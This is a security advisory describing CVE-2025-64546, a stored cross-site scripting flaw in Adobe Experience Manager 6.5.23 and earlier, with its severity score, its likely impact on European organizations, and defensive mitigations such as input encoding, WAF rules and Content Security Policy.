CVE-2025-64546 is a stored Cross-Site Scripting (XSS) vulnerability identified in Adobe Experience Manager (AEM) versions 6.5.23 and earlier. The flaw resides in the handling of user input within certain form fields, which do not properly sanitize or encode input before storing it. An attacker with low privileges can inject malicious JavaScript code into these fields. When other users, including administrators or content editors, access the affected pages, the malicious script executes in their browsers. This can lead to theft of session cookies, redirection to malicious sites, or execution of unauthorized actions within the victim's session context. The vulnerability is classified under CWE-79 and has a CVSS 3.1 base score of 5.4, indicating medium severity. The attack vector is network-based, requiring low attack complexity, low privileges, and user interaction to trigger the payload. The scope is changed, meaning the vulnerability can affect components beyond the initially vulnerable module. No patches or exploit code are currently publicly available, but the vulnerability is officially published and should be addressed promptly. Stored XSS in a widely used enterprise content management system like AEM poses risks to confidentiality and integrity of user sessions and data, potentially enabling further attacks such as privilege escalation or lateral movement within affected environments.

For European organizations, the impact of this vulnerability can be significant, especially for those relying on Adobe Experience Manager for managing digital content and customer-facing portals. Exploitation can lead to unauthorized access to sensitive information, session hijacking, and potential defacement or manipulation of web content. This can damage organizational reputation, lead to data breaches, and disrupt business operations. Given the medium severity, the vulnerability does not directly compromise system availability or allow remote code execution, but the ability to execute scripts in users' browsers can facilitate phishing, credential theft, or delivery of secondary malware. Organizations in sectors such as finance, government, healthcare, and e-commerce, which often use AEM for digital experience management, may face increased risks. Additionally, regulatory frameworks like GDPR impose strict requirements on protecting user data, and exploitation of this vulnerability could lead to compliance violations and financial penalties.

Organizations should immediately identify all instances of Adobe Experience Manager version 6.5.23 or earlier in their environment. Since no official patches are currently available, temporary mitigations include implementing strict input validation and output encoding on all user-controllable fields within AEM forms to prevent script injection. Web Application Firewalls (WAFs) can be configured to detect and block common XSS payloads targeting AEM. Additionally, Content Security Policy (CSP) headers should be enforced to restrict the execution of unauthorized scripts. Regularly auditing and sanitizing stored content can help identify and remove malicious scripts. User awareness training should emphasize caution when interacting with AEM-managed content. Organizations should monitor Adobe security advisories closely for forthcoming patches and apply them promptly once released. Finally, logging and monitoring for unusual user activity or script execution anomalies can aid in early detection of exploitation attempts.